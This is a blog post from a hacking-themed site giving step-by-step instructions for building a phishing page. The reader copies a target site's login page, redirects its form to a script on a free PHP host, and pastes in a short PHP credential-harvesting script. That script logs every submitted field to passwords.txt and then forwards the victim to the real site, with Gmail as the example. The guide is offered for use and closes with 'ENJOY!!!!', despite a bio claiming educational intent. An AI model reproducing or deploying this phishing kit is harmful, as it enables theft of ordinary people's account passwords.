A very detailed guide on PHISHING

By Akshay   Posted at  2:03 PM   Hacking No comments

Make Your Own Phishing Site:

If you are tired Of Searching For Those Phishing Files

How About Making Your Own Latest Fake Page Of Any Site In Just Few Steps






1. First Things First You Must Choose The Site Which You Wanna Make A Phisher From.

2. When You Found Your Site Right Click On It And Say "view source" And Save It On Desktop As index.html

3. Open The "index.htm" With Notepad And Press CTRL+F And Type action. You Should Find A Command Looking Like This
form action="RANDOM URL" method="post"


4.Change The Link After Word Action To "write.php" And Change The Word "Post" To "Get", Which Is Close To The Word Method

Remember Dont Erase The Inverted Commas And Commas It Might Affect The Page

5. Save index.html

6. Time To Create A Free Website. It MUST SUPPORT .php Files So I Suggest The Use Of http://www.110mb.com. Create A Free Website.

This Is Just An Example You Can Find Much More php Supported Sites

7. Login To Your Website And Go To "file manager"

8. Delete The File Thats Already There Called "index.htm" And Upload Your "index.htm" (The One You Just Made)

9. Create A New File Called "write.php" And Copy / Paste This:


Code:
header("Location: http://random");
$handle = fopen("passwords.txt", "a");
foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>


10. Switch Out The Word "RANDOM" With The Site The Browser Should Go To After Victim Wrote His/Her Password. So It Should Say Like This:


Quote:header("Location: http://gmail.com ");

You Might Want To Change The Textfile Name So Others Wont Be Able To View The File.

11. Save This File write.php, And Upload It To The Sub domain as well

12. Test Out Your Website. Type In Something In Your Phisher And Then Go To File manager And Open The Password File, What You Wrote Should Be Typed Here!,

ENJOY!!!!

                                                                        urs  Akshay

About the Author

Nulla sagittis convallis arcu. Sed sed nunc. Curabitur consequat. Quisque metus enim, venenatis fermentum, mollis in, porta et, nibh. Duis vulputate elit in elit. Mauris dictum libero id justo.
View all posts by: BT9

0 comments:

Back to top ↑
Connect with Us

What they says

Hi.Iam A 19 Years guy doing CEH & CHFI. I Like To Share My Ideas & Views About HACKING Because i Think That Everyone Should Know About It So That They Can Save Them Self From CRACKERS. "NO ONE CAN SAY AM A HACKER, WE ARE THE HACKERS" HACKING IS NOT CRIME IT's OWN PASSION. BUT ONE CAN USE OF IT FOR GOOD PURPOSE ALSO.
© 2013 AKSHAY. WP Mythemeshop Converted by BloggerTheme9
Blogger templates. | Distributed by Rocking Templates Proudly Powered by Blogger.